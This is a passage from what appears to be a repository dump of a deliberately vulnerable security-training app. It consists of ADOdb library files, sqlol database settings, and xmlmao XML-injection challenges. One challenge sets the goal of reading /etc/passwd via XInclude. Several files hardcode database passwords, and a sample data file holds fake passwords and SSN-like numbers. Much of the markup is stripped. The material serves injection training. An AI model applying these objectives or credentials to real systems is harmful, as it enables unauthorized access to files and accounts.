'anslutning misslyckades', 27 | 0 => 'inget fel', // DB_OK 28 | DB_ERROR_NEED_MORE_DATA => 'otillräckligt med data angivet', 29 | DB_ERROR_EXTENSION_NOT_FOUND=> 'utökning hittades ej', 30 | DB_ERROR_NOSUCHDB => 'ingen sådan databas', 31 | DB_ERROR_ACCESS_VIOLATION => 'otillräckliga rättigheter' 32 | ); 33 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/lang/adodb-th.inc.php: -------------------------------------------------------------------------------- 1 | 3 | $ADODB_LANG_ARRAY = array ( 4 | 'LANG' => 'th', 5 | DB_ERROR => 'error ไม่รู้สาเหตุ', 6 | DB_ERROR_ALREADY_EXISTS => 'มี�?ล้ว', 7 | DB_ERROR_CANNOT_CREATE => 'สร้างไม่ได้', 8 | DB_ERROR_CANNOT_DELETE => 'ลบไม่ได้', 9 | DB_ERROR_CANNOT_DROP => 'drop ไม่ได้', 10 | DB_ERROR_CONSTRAINT => 'constraint violation', 11 | DB_ERROR_DIVZERO => 'หา�?ด้วยสู�?', 12 | DB_ERROR_INVALID => 'ไม่ valid', 13 | DB_ERROR_INVALID_DATE => 'วันที่ เวลา ไม่ valid', 14 | DB_ERROR_INVALID_NUMBER => 'เลขไม่ valid', 15 | DB_ERROR_MISMATCH => 'mismatch', 16 | DB_ERROR_NODBSELECTED => 'ไม่ได้เลือ�?�?านข้อมูล', 17 | DB_ERROR_NOSUCHFIELD => 'ไม่มีฟีลด์นี้', 18 | DB_ERROR_NOSUCHTABLE => 'ไม่มีตารางนี้', 19 | DB_ERROR_NOT_CAPABLE => 'DB backend not capable', 20 | DB_ERROR_NOT_FOUND => 'ไม่พบ', 21 | DB_ERROR_NOT_LOCKED => 'ไม่ได้ล๊อ�?', 22 | DB_ERROR_SYNTAX => 'ผิด syntax', 23 | DB_ERROR_UNSUPPORTED => 'ไม่ support', 24 | DB_ERROR_VALUE_COUNT_ON_ROW => 'value count on row', 25 | DB_ERROR_INVALID_DSN => 'invalid DSN', 26 | DB_ERROR_CONNECT_FAILED => 'ไม่สามารถ connect', 27 | 0 => 'no error', 28 | DB_ERROR_NEED_MORE_DATA => 'ข้อมูลไม่เพียงพอ', 29 | DB_ERROR_EXTENSION_NOT_FOUND=> 'ไม่พบ extension', 30 | DB_ERROR_NOSUCHDB => 'ไม่มีข้อมูลนี้', 31 | DB_ERROR_ACCESS_VIOLATION => 'permissions ไม่พอ' 32 | ); 33 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/lang/adodb-uk.inc.php: -------------------------------------------------------------------------------- 1 | 'uk', 7 | DB_ERROR => 'невідома помилка', 8 | DB_ERROR_ALREADY_EXISTS => 'вже існує', 9 | DB_ERROR_CANNOT_CREATE => 'неможливо створити', 10 | DB_ERROR_CANNOT_DELETE => 'неможливо видалити', 11 | DB_ERROR_CANNOT_DROP => 'неможливо знищити (drop)', 12 | DB_ERROR_CONSTRAINT => 'порушення умов перевірки', 13 | DB_ERROR_DIVZERO => 'ділення на 0', 14 | DB_ERROR_INVALID => 'неправильно', 15 | DB_ERROR_INVALID_DATE => 'неправильна дата чи час', 16 | DB_ERROR_INVALID_NUMBER => 'неправильне число', 17 | DB_ERROR_MISMATCH => 'помилка', 18 | DB_ERROR_NODBSELECTED => 'не вибрано БД', 19 | DB_ERROR_NOSUCHFIELD => 'не існує поле', 20 | DB_ERROR_NOSUCHTABLE => 'не існує таблиця', 21 | DB_ERROR_NOT_CAPABLE => 'СУБД не в стані', 22 | DB_ERROR_NOT_FOUND => 'не знайдено', 23 | DB_ERROR_NOT_LOCKED => 'не заблоковано', 24 | DB_ERROR_SYNTAX => 'синтаксична помилка', 25 | DB_ERROR_UNSUPPORTED => 'не підтримується', 26 | DB_ERROR_VALUE_COUNT_ON_ROW => 'рахівник значень в стрічці', 27 | DB_ERROR_INVALID_DSN => 'неправильна DSN', 28 | DB_ERROR_CONNECT_FAILED => 'з\'єднання неуспішне', 29 | 0 => 'все гаразд', // DB_OK 30 | DB_ERROR_NEED_MORE_DATA => 'надано недостатньо даних', 31 | DB_ERROR_EXTENSION_NOT_FOUND=> 'розширення не знайдено', 32 | DB_ERROR_NOSUCHDB => 'не існує БД', 33 | DB_ERROR_ACCESS_VIOLATION => 'недостатньо прав доступа' 34 | ); 35 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/nbproject/private/config.properties: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SpiderLabs/MCIR/49a292e2c4df90af39b0792d5678579a9f72a6a7/sqlol/includes/adodb/nbproject/private/config.properties -------------------------------------------------------------------------------- /sqlol/includes/adodb/nbproject/private/private.properties: -------------------------------------------------------------------------------- 1 | copy.src.files=false 2 | copy.src.on.open=false 3 | copy.src.target= 4 | index.file=test-sqlite.php 5 | run.as=SCRIPT 6 | url=http://localhost/ 7 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/nbproject/private/private.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/nbproject/project.properties: -------------------------------------------------------------------------------- 1 | include.path=${php.global.include.path} 2 | php.version=PHP_56 3 | source.encoding=UTF-8 4 | src.dir=. 5 | tags.asp=false 6 | tags.short=false 7 | web.root=. 8 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/nbproject/project.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | org.netbeans.modules.php.project 4 | 5 | 6 | adodb-php 7 | 8 | 9 | 10 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/pear/auth_adodb_example.php: -------------------------------------------------------------------------------- 1 | 7 |
8 | 9 | 10 | 11 |
12 | $dsn, 'table' => 'auth', 'cryptType' => 'none', 18 | 'usernamecol' => 'username', 'passwordcol' => 'password'); 19 | $a = new Auth("ADOdb", $params, "loginFunction"); 20 | $a->start(); 21 | 22 | if ($a->getAuth()) { 23 | echo "Success"; 24 | // * The output of your site goes here. 25 | } 26 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/pear/readme.Auth.txt: -------------------------------------------------------------------------------- 1 | From: Rich Tango-Lowy (richtl#arscognita.com) 2 | Date: Sat, May 29, 2004 11:20 am 3 | 4 | OK, I hacked out an ADOdb container for PEAR-Auth. The error handling's 5 | a bit of a mess, but all the methods work. 6 | 7 | Copy ADOdb.php to your pear/Auth/Container/ directory. 8 | 9 | Use the ADOdb container exactly as you would the DB 10 | container, but specify 'ADOdb' instead of 'DB': 11 | 12 | $dsn = "mysql://myuser:mypass@localhost/authdb"; 13 | $a = new Auth("ADOdb", $dsn, "loginFunction"); 14 | 15 | 16 | ------------------- 17 | 18 | John Lim adds: 19 | 20 | See http://pear.php.net/manual/en/package.authentication.php 21 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/rsfilter.inc.php: -------------------------------------------------------------------------------- 1 | $v) { 33 | $arr[$k] = ucwords($v); 34 | } 35 | } 36 | $rs = RSFilter($rs,'do_ucwords'); 37 | */ 38 | function RSFilter($rs,$fn) 39 | { 40 | if ($rs->databaseType != 'array') { 41 | if (!$rs->connection) return false; 42 | 43 | $rs = $rs->connection->_rs2rs($rs); 44 | } 45 | $rows = $rs->RecordCount(); 46 | for ($i=0; $i < $rows; $i++) { 47 | if (is_array ($fn)) { 48 | $obj = $fn[0]; 49 | $method = $fn[1]; 50 | $obj->$method ($rs->_array[$i],$rs); 51 | } else { 52 | $fn($rs->_array[$i],$rs); 53 | } 54 | 55 | } 56 | if (!$rs->EOF) { 57 | $rs->_currentRow = 0; 58 | $rs->fields = $rs->_array[0]; 59 | } 60 | 61 | return $rs; 62 | } 63 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/session/adodb-compress-gzip.php: -------------------------------------------------------------------------------- 1 | _level; 36 | } 37 | 38 | /** 39 | */ 40 | function setLevel($level) { 41 | assert('$level >= 0'); 42 | assert('$level <= 9'); 43 | $this->_level = (int) $level; 44 | } 45 | 46 | /** 47 | */ 48 | function getMinLength() { 49 | return $this->_min_length; 50 | } 51 | 52 | /** 53 | */ 54 | function setMinLength($min_length) { 55 | assert('$min_length >= 0'); 56 | $this->_min_length = (int) $min_length; 57 | } 58 | 59 | /** 60 | */ 61 | function __construct($level = null, $min_length = null) { 62 | if (!is_null($level)) { 63 | $this->setLevel($level); 64 | } 65 | 66 | if (!is_null($min_length)) { 67 | $this->setMinLength($min_length); 68 | } 69 | } 70 | 71 | /** 72 | */ 73 | function write($data, $key) { 74 | if (strlen($data) < $this->_min_length) { 75 | return $data; 76 | } 77 | 78 | if (!is_null($this->_level)) { 79 | return gzcompress($data, $this->_level); 80 | } else { 81 | return gzcompress($data); 82 | } 83 | } 84 | 85 | /** 86 | */ 87 | function read($data, $key) { 88 | return $data ? gzuncompress($data) : $data; 89 | } 90 | 91 | } 92 | 93 | return 1; 94 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/session/adodb-cryptsession.php: -------------------------------------------------------------------------------- 1 | encrypt($data, $key); 28 | } 29 | 30 | /** 31 | */ 32 | function read($data, $key) { 33 | $md5crypt = new MD5Crypt(); 34 | return $md5crypt->decrypt($data, $key); 35 | } 36 | 37 | } 38 | 39 | return 1; 40 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/session/adodb-encrypt-secret.php: -------------------------------------------------------------------------------- 1 | encrypt($data, $key); 17 | 18 | } 19 | 20 | 21 | function read($data, $key) 22 | { 23 | $sha1crypt = new SHA1Crypt(); 24 | return $sha1crypt->decrypt($data, $key); 25 | 26 | } 27 | } 28 | 29 | 30 | 31 | return 1; 32 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/session/adodb-session-clob.php: -------------------------------------------------------------------------------- 1 | 3 | class MD5Crypt{ 4 | function keyED($txt,$encrypt_key) 5 | { 6 | $encrypt_key = md5($encrypt_key); 7 | $ctr=0; 8 | $tmp = ""; 9 | for ($i=0;$ikeyED($tmp,$key)); 31 | } 32 | 33 | function Decrypt($txt,$key) 34 | { 35 | $txt = $this->keyED(base64_decode($txt),$key); 36 | $tmp = ""; 37 | for ($i=0;$i= 58 && $randnumber <= 64) || ($randnumber >= 91 && $randnumber <= 96)) 54 | { 55 | $randnumber = rand(48,120); 56 | } 57 | 58 | $randomPassword .= chr($randnumber); 59 | } 60 | return $randomPassword; 61 | } 62 | 63 | } 64 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/session/session_schema.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | table for ADOdb session-management 5 | 6 | 7 | session key 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 |
26 | 27 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/session/session_schema2.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | table for ADOdb session-management 5 | 6 | 7 | session key 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 |
38 | 39 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/tests/test-active-recs2.php: -------------------------------------------------------------------------------- 1 | Connect("localhost","tester","test","test"); 19 | } else 20 | $db = NewADOConnection('oci8://scott:natsoft@/'); 21 | 22 | 23 | $arr = $db->ServerInfo(); 24 | echo "

$db->dataProvider: {$arr['description']}

"; 25 | 26 | $arr = $db->GetActiveRecords('products',' productid<10'); 27 | adodb_pr($arr); 28 | 29 | ADOdb_Active_Record::SetDatabaseAdapter($db); 30 | if (!$db) die('failed'); 31 | 32 | 33 | 34 | 35 | $rec = new ADODB_Active_Record('photos'); 36 | 37 | $rec = new ADODB_Active_Record('products'); 38 | 39 | 40 | adodb_pr($rec->getAttributeNames()); 41 | 42 | echo "
"; 43 | 44 | 45 | $rec->load('productid=2'); 46 | adodb_pr($rec); 47 | 48 | $db->debug=1; 49 | 50 | 51 | $rec->productname = 'Changie Chan'.rand(); 52 | 53 | $rec->insert(); 54 | $rec->update(); 55 | 56 | $rec->productname = 'Changie Chan 99'; 57 | $rec->replace(); 58 | 59 | 60 | $rec2 = new ADODB_Active_Record('products'); 61 | $rec->load('productid=3'); 62 | $rec->save(); 63 | 64 | $rec = new ADODB_Active_record('products'); 65 | $rec->productname = 'John ActiveRec'; 66 | $rec->notes = 22; 67 | #$rec->productid=0; 68 | $rec->discontinued=1; 69 | $rec->Save(); 70 | $rec->supplierid=33; 71 | $rec->Save(); 72 | $rec->discontinued=0; 73 | $rec->Save(); 74 | $rec->Delete(); 75 | 76 | echo "

Affected Rows after delete=".$db->Affected_Rows()."

"; 77 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/tests/test-perf.php: -------------------------------------------------------------------------------- 1 | $v) { 10 | if (strncmp($k,'test',4) == 0) $_SESSION['_db'] = $k; 11 | } 12 | } 13 | 14 | if (isset($_SESSION['_db'])) { 15 | $_db = $_SESSION['_db']; 16 | $_GET[$_db] = 1; 17 | $$_db = 1; 18 | } 19 | 20 | echo "

Performance Monitoring

"; 21 | include_once('testdatabases.inc.php'); 22 | 23 | 24 | function testdb($db) 25 | { 26 | if (!$db) return; 27 | echo "";print_r($db->ServerInfo()); echo " user=".$db->user.""; 28 | 29 | $perf = NewPerfMonitor($db); 30 | 31 | # unit tests 32 | if (0) { 33 | //$DB->debug=1; 34 | echo "Data Cache Size=".$perf->DBParameter('data cache size').'

'; 35 | echo $perf->HealthCheck(); 36 | echo($perf->SuspiciousSQL()); 37 | echo($perf->ExpensiveSQL()); 38 | echo($perf->InvalidSQL()); 39 | echo $perf->Tables(); 40 | 41 | echo "

";
42 | 		echo $perf->HealthCheckCLI();
43 | 		$perf->Poll(3);
44 | 		die();
45 | 	}
46 | 
47 | 	if ($perf) $perf->UI(3);
48 | }
49 | 


--------------------------------------------------------------------------------
/sqlol/includes/adodb/tests/test-xmlschema.php:
--------------------------------------------------------------------------------
 1 | Connect( 'localhost', 'root', '', 'test' ) || die('fail connect1');
12 | 
13 | // To create a schema object and build the query array.
14 | $schema = new adoSchema( $db );
15 | 
16 | // To upgrade an existing schema object, use the following
17 | // To upgrade an existing database to the provided schema,
18 | // uncomment the following line:
19 | #$schema->upgradeSchema();
20 | 
21 | print "SQL to build xmlschema.xml:\n
";
22 | // Build the SQL array
23 | $sql = $schema->ParseSchema( "xmlschema.xml" );
24 | 
25 | var_dump( $sql );
26 | print "
\n";
27 | 
28 | // Execute the SQL on the database
29 | //$result = $schema->ExecuteSchema( $sql );
30 | 
31 | // Finally, clean up after the XML parser
32 | // (PHP won't do this for you!)
33 | //$schema->Destroy();
34 | 
35 | 
36 | 
37 | print "SQL to build xmlschema-mssql.xml:\n
";
38 | 
39 | $db2 = ADONewConnection('mssql');
40 | $db2->Connect('','adodb','natsoft','northwind') || die("Fail 2");
41 | 
42 | $db2->Execute("drop table simple_table");
43 | 
44 | $schema = new adoSchema( $db2 );
45 | $sql = $schema->ParseSchema( "xmlschema-mssql.xml" );
46 | 
47 | print_r( $sql );
48 | print "
\n";
49 | 
50 | $db2->debug=1;
51 | 
52 | foreach ($sql as $s)
53 | $db2->Execute($s);
54 | 


--------------------------------------------------------------------------------
/sqlol/includes/adodb/tests/test2.php:
--------------------------------------------------------------------------------
 1 | debug=1;
 9 | 	$access = 'd:\inetpub\wwwroot\php\NWIND.MDB';
10 | 	$myDSN =  'PROVIDER=Microsoft.Jet.OLEDB.4.0;'
11 | 		. 'DATA SOURCE=' . $access . ';';
12 | 
13 | 	echo "
PHP ",PHP_VERSION,"
";
14 | 
15 | 	$db->Connect($myDSN) || die('fail');
16 | 
17 | 	print_r($db->ServerInfo());
18 | 
19 | 	try {
20 | 	$rs = $db->Execute("select $db->sysTimeStamp,* from adoxyz where id>02xx");
21 | 	print_r($rs->fields);
22 | 	} catch(exception $e) {
23 | 	print_r($e);
24 | 	echo "
 Date m/d/Y =",$db->UserDate($rs->fields[4],'m/d/Y');
25 | 	}
26 | 


--------------------------------------------------------------------------------
/sqlol/includes/adodb/tests/test3.php:
--------------------------------------------------------------------------------
 1 | Connect('','scott','natsoft');
23 | $db->debug=1;
24 | 
25 | $cnt = $db->GetOne("select count(*) from adoxyz");
26 | $rs = $db->Execute("select * from adoxyz order by id");
27 | 
28 | $i = 0;
29 | foreach($rs as $k => $v) {
30 | 	$i += 1;
31 | 	echo $k; adodb_pr($v);
32 | 	flush();
33 | }
34 | 
35 | if ($i != $cnt) die("actual cnt is $i, cnt should be $cnt\n");
36 | 
37 | 
38 | 
39 | $rs = $db->Execute("select bad from badder");
40 | 
41 | } catch (exception $e) {
42 | 	adodb_pr($e);
43 | 	$e = adodb_backtrace($e->trace);
44 | }
45 | 


--------------------------------------------------------------------------------
/sqlol/includes/adodb/tests/test5.php:
--------------------------------------------------------------------------------
 1 | debug=1;
25 | 	$conn->PConnect("localhost","root","","xphplens");
26 | 	print $conn->databaseType.':'.$conn->GenID().'
';
27 | }
28 | 
29 | if (0) {
30 | 	$conn = ADONewConnection("oci8");  // create a connection
31 | 	$conn->debug=1;
32 | 	$conn->PConnect("falcon", "scott", "tiger", "juris8.ecosystem.natsoft.com.my"); // connect to MySQL, testdb
33 | 	print $conn->databaseType.':'.$conn->GenID();
34 | }
35 | 
36 | if (0) {
37 | 	$conn = ADONewConnection("ibase");  // create a connection
38 | 	$conn->debug=1;
39 | 	$conn->Connect("localhost:c:\\Interbase\\Examples\\Database\\employee.gdb", "sysdba", "masterkey", ""); // connect to MySQL, testdb
40 | 	print $conn->databaseType.':'.$conn->GenID().'
';
41 | }
42 | 
43 | if (0) {
44 | 	$conn = ADONewConnection('postgres');
45 | 	$conn->debug=1;
46 | 	@$conn->PConnect("susetikus","tester","test","test");
47 | 	print $conn->databaseType.':'.$conn->GenID().'
';
48 | }
49 | 


--------------------------------------------------------------------------------
/sqlol/includes/adodb/tests/test_rs_array.php:
--------------------------------------------------------------------------------
 1 | InitArray($array,$typearr);
17 | 
18 | while (!$rs->EOF) {
19 | 	print_r($rs->fields);echo "
";
20 | 	$rs->MoveNext();
21 | }
22 | 
23 | echo "
 1 Seek
";
24 | $rs->Move(1);
25 | while (!$rs->EOF) {
26 | 	print_r($rs->fields);echo "
";
27 | 	$rs->MoveNext();
28 | }
29 | 
30 | echo "
 2 Seek
";
31 | $rs->Move(2);
32 | while (!$rs->EOF) {
33 | 	print_r($rs->fields);echo "
";
34 | 	$rs->MoveNext();
35 | }
36 | 
37 | echo "
 3 Seek
";
38 | $rs->Move(3);
39 | while (!$rs->EOF) {
40 | 	print_r($rs->fields);echo "
";
41 | 	$rs->MoveNext();
42 | }
43 | 
44 | 
45 | 
46 | die();
47 | 


--------------------------------------------------------------------------------
/sqlol/includes/adodb/tests/testcache.php:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | PConnect('nwind');
22 | } else {
23 | 	$db = ADONewConnection('mysql');
24 | 	$db->PConnect('mangrove','root','','xphplens');
25 | }
26 | if (isset($cache)) $rs = $db->CacheExecute(120,'select * from products');
27 | else $rs = $db->Execute('select * from products');
28 | 
29 | $arr = $rs->GetArray();
30 | print sizeof($arr);
31 | 


--------------------------------------------------------------------------------
/sqlol/includes/adodb/tests/testgenid.php:
--------------------------------------------------------------------------------
 1 | Execute("drop table $table");
17 | 	//$db->debug=true;
18 | 
19 | 	$ctr = 5000;
20 | 	$lastnum = 0;
21 | 
22 | 	while (--$ctr >= 0) {
23 | 		$num = $db->GenID($table);
24 | 		if ($num === false) {
25 | 			print "GenID returned false";
26 | 			break;
27 | 		}
28 | 		if ($lastnum + 1 == $num) print " $num ";
29 | 		else {
30 | 			print " $num ";
31 | 			flush();
32 | 		}
33 | 		$lastnum = $num;
34 | 	}
35 | }
36 | 


--------------------------------------------------------------------------------
/sqlol/includes/adodb/tests/testpear.php:
--------------------------------------------------------------------------------
 1 | setFetchMode(ADODB_FETCH_ASSOC);
27 | $rs = $db->Query('select firstname,lastname from adoxyz');
28 | $cnt = 0;
29 | while ($arr = $rs->FetchRow()) {
30 | 	print_r($arr);
31 | 	print "
";
32 | 	$cnt += 1;
33 | }
34 | 
35 | if ($cnt != 50) print "Error in \$cnt = $cnt";
36 | 


--------------------------------------------------------------------------------
/sqlol/includes/adodb/tests/time.php:
--------------------------------------------------------------------------------
 1 | 
 6 | " );
16 | echo( "Converted: $convertedDate" ); //why is string returned as one day (3 not 4) less for this example??
17 | 


--------------------------------------------------------------------------------
/sqlol/includes/adodb/tests/xmlschema-mssql.xml:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
 4 | 
 5 | 
 6 | 
 7 | 
 8 | 
 9 | 
10 | 
11 | 
12 | 
13 | 
14 | id
15 | 
16 | 
17 | id
18 | 
19 | 
20 | 
21 | 

22 |   
23 |     SQL to be executed only on specific platforms
24 |     
25 |       insert into mytable ( row1, row2 ) values ( 12, 'postgres stuff' )
26 |     
27 |     
28 |       insert into mytable ( row1, row2 ) values ( 12, 'mysql stuff' )
29 |     
30 | 	
31 |       INSERT into simple_table ( name, description ) values ( '12', 'Microsoft stuff' )
32 |     
33 |   
34 | 


--------------------------------------------------------------------------------
/sqlol/includes/adodb/tests/xmlschema.xml:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 |   
 4 |     
 5 |       An integer row that's a primary key and autoincrements
 6 |       
 7 |       
 8 |     
 9 |     
10 |       A 16 character varchar row that can't be null
11 |       
12 |     
13 |     
14 |       row1
15 |       row2
16 |     
17 |   

18 |   
19 |     SQL to be executed only on specific platforms
20 |     
21 |       insert into mytable ( row1, row2 ) values ( 12, 'postgres stuff' )
22 |     
23 |     
24 |       insert into mytable ( row1, row2 ) values ( 12, 'mysql stuff' )
25 |     
26 | 	
27 |       insert into mytable ( row1, row2 ) values ( 12, 'Microsoft stuff' )
28 |     
29 |   
30 |   
31 |     
32 |   

33 | 


--------------------------------------------------------------------------------
/sqlol/includes/adodb/x.php:
--------------------------------------------------------------------------------
 1 | connect('localhost', 'root', 'C0yote71', 'mantis_13x');
 6 | 
 7 | $t = 'mantis_user_table';
 8 | $c = array('username' => 'test');
 9 | print $db->getinsertsql($t, $c) . PHP_EOL;
10 | 


--------------------------------------------------------------------------------
/sqlol/includes/adodb/xmlschema.dtd:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 4 | 
 5 | 
 6 | 
 8 | 
 9 | 
10 | 
11 | 
12 | 
13 | 
14 | 
15 | 
16 | 
17 | 
18 | 
19 | 
20 | 
21 | 
22 | 
23 | 
24 | 
25 | 
26 | 
27 | 
28 | 
29 | 
30 | 
31 | 
32 | 
33 | 
34 | 
35 | 
36 | 
37 | 
38 | 
39 | ] >


--------------------------------------------------------------------------------
/sqlol/includes/adodb/xmlschema03.dtd:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 4 | 
 5 | 
 6 | 
 7 | 
 8 | 
 9 | 
10 | 
11 | 
12 | 
13 | 
14 | 
15 | 
16 | 
17 | 
18 | 
19 | 
20 | 
21 | 
22 | 
23 | 
24 | 
25 | 
26 | 
27 | 
28 | 
29 | 
30 | 
31 | 
32 | 
33 | 
34 | 
35 | 
36 | 
37 | 
38 | 
39 | 
40 | 
41 | 
42 | 
43 | ]>


--------------------------------------------------------------------------------
/sqlol/includes/adodb/xsl/remove-0.2.xsl:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 5 | 	
 6 | 
 7 | 	
 8 | 	
 9 | 		
10 | ADODB XMLSchema
11 | http://adodb-xmlschema.sourceforge.net
12 | 
13 | 
14 | 		
15 | Uninstallation Schema
16 | 
17 | 
18 | 		
19 | 			0.2
20 | 
21 | 			
22 | 				
23 | 			
24 | 		
25 | 	
26 | 
27 | 	
28 | 	
29 | 		
30 | 			
31 | 				
32 | 
33 | 				
34 | 					
35 | 				
36 | 
37 | 				
38 | 					
39 | 				
40 | 
41 | 				
42 | 
43 | 				
44 | 			
45 | 		
46 | 	
47 | 
48 | 	
49 | 	
50 | 		
51 | 			
52 | 		
53 | 	
54 | 


--------------------------------------------------------------------------------
/sqlol/includes/adodb/xsl/remove-0.3.xsl:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 5 | 	
 6 | 
 7 | 	
 8 | 	
 9 | 		
10 | ADODB XMLSchema
11 | http://adodb-xmlschema.sourceforge.net
12 | 
13 | 
14 | 		
15 | Uninstallation Schema
16 | 
17 | 
18 | 		
19 | 			0.3
20 | 
21 | 			
22 | 				
23 | 			
24 | 		
25 | 	
26 | 
27 | 	
28 | 	
29 | 		
30 | 			
31 | 				
32 | 
33 | 				
34 | 					
35 | 				
36 | 
37 | 				
38 | 					
39 | 				
40 | 
41 | 				
42 | 
43 | 				
44 | 			
45 | 		
46 | 	
47 | 
48 | 	
49 | 	
50 | 		
51 | 			
52 | 		
53 | 	
54 | 


--------------------------------------------------------------------------------
/sqlol/includes/database.config.php:
--------------------------------------------------------------------------------
 1 | .
14 | */
15 | 
16 | //Choose the appropriate type of database here
17 | 
18 | //Choose me for MySQL
19 | $dbtype = 'mysqli';
20 | $server = '127.0.0.1';
21 | $port = '3306';
22 | $username = 'root';
23 | $password = 'default_mcir_db_password';
24 | $database = 'sqlol';
25 | $persist = '';
26 | 
27 | $hostspec = $username.':'.$password.'@'.$server.':'.$port;
28 | 
29 | 
30 | /*//Choose me for PostgreSQL
31 | $dbtype = 'postgres';
32 | $server = '127.0.0.1';
33 | $port = '5432';
34 | $username = 'postgres';
35 | $password = 'postgres';
36 | $database = 'sqlol';
37 | $persist = '';
38 | 
39 | $hostspec = $username.':'.$password.'@'.$server.':'.$port;
40 | */
41 | 
42 | /*//Choose me for SQLite
43 | $dbtype = 'sqlite';
44 | $hostspec = urlencode('c:\path\to\sqlite.db');
45 | $database = ''; //Keep this value set to null for SQLite
46 | $persist = ''; //Don't persist, SQLite is bad at concurrent connections
47 | */
48 | 
49 | ?>
50 | 


--------------------------------------------------------------------------------
/sqlol/includes/nav.inc.php:
--------------------------------------------------------------------------------
 1 | .
12 | */
13 | ?>
14 | 

15 | | INSERT || UPDATE || DELETE || SELECT || Custom || Challenges |

16 | 
RESET

17 | 

18 | 
19 | 

20 | 

21 | 

22 | 

23 | 


--------------------------------------------------------------------------------
/sqlol/index.php:
--------------------------------------------------------------------------------
 1 | .
12 | */
13 | 
14 | header('Location: select.php');
15 | 
16 | ?>
17 | 


--------------------------------------------------------------------------------
/xmlmao/data.xml:
--------------------------------------------------------------------------------
 1 | 
12 | 
13 | 
14 | 	
15 | 		
16 | 		1
17 | 		jsmiley
18 | 		jsmiley
19 | 		123-456-7890
20 | 	
21 | 	
22 | 		
23 | 		2
24 | 		cmacrunfast
25 | 		speedsupto3
26 | 		603-478-4115
27 | 	
28 | 	
29 | 		
30 | 		3
31 | 		mitch
32 | 		@lltogether
33 | 		222-222-2222
34 | 	
35 | 
36 | 
37 | 	
38 | 		jsmiley
39 | 		111-22-3333
40 | 	
41 | 	
42 | 		cmacrunfast
43 | 		123-45-6789
44 | 	
45 | 	
46 | 		mitch
47 | 		010-10-1010
48 | 	
49 | 
50 | 
51 | 


--------------------------------------------------------------------------------
/xmlmao/includes/nav.inc.php:
--------------------------------------------------------------------------------
 1 | .
12 | */
13 | ?>
14 | 
| XPath Injection || XML Injection || XSL Injection || Challenges | 

15 | 

16 | 

17 | 

18 | 

19 | 
20 | 


--------------------------------------------------------------------------------
/xmlmao/index.php:
--------------------------------------------------------------------------------
 1 | .
12 | */
13 | 
14 | header('Location: xpath.php');
15 | 
16 | ?>
17 | 


--------------------------------------------------------------------------------
/xmlmao/xmli_challenges/challenge0.php:
--------------------------------------------------------------------------------
 1 | .
12 | */
13 | ?>
14 | 
15 | 
16 | 	XMLmao - XML Injection Challenge 0 - Hello, world!
17 | 
18 | 
19 | 
20 | 	
XMLmao - XML Injection Challenge 0 - Hello, world!


21 | 
22 | 	

23 | 	

24 | 	

25 | 

26 | 	
27 | You must perform the simplest of XML injection attacks.

28 | 

29 | Your objective is to inject an additional "data" tag into the XML.
30 | 
31 | 
32 | PARAMETERS:
33 | Injection Type - CDATA-wrapped value
34 | Sanitization - None
35 | Output - All results, verbose errors, xml shown
36 | 

37 | 
38 | 

39 | 

40 | 	
41 | 	
42 | 	
43 | 	
44 | 	Injection String: 

45 | 	
46 | 

47 | 

48 | 
49 | 
50 | 


--------------------------------------------------------------------------------
/xmlmao/xmli_challenges/challenge1.php:
--------------------------------------------------------------------------------
 1 | .
12 | */
13 | ?>
14 | 
15 | 
16 | 	XMLmao - XML Injection Challenge 1 - There Can Be Only One
17 | 
18 | 
19 | 
20 | 	
XMLmao - XML Injection Challenge 1 - There Can Be Only One


21 | 
22 | 	

23 | 	

24 | 	

25 | 

26 | 	
27 | This challenge requires you to insert your own data tag and prevent the original from being parsed.

28 | 

29 | Your objective is to get the application to return only the value "winrar".
30 | 
31 | 
32 | PARAMETERS:
33 | Injection Type - Attribute
34 | Sanitization - None
35 | Output - All results, verbose errors, xml shown
36 | 

37 | 
38 | 

39 | 

40 | 	
41 | 	
42 | 	
43 | 	
44 | 	Injection String: 

45 | 	
46 | 

47 | 

48 | 
49 | 
50 | 


--------------------------------------------------------------------------------
/xmlmao/xmli_challenges/challenge5.php:
--------------------------------------------------------------------------------
 1 | .
12 | */
13 | ?>
14 | 
15 | 
16 | 	XMLmao - XML Injection Challenge 5 - XInclude
17 | 
18 | 
19 | 
20 | 	
XMLmao - XML Injection Challenge 5 - XInclude


21 | 
22 | 	

23 | 	

24 | 	

25 | 

26 | 	
27 | XInclude is a way of merging XML documents or creating dynamic XML content by including external content.
28 | 

29 | Your objective is to read /etc/passwd or c:\boot.ini using XInclude.
30 | 
31 | 
32 | PARAMETERS:
33 | Injection Type - CDATA-wrapped value
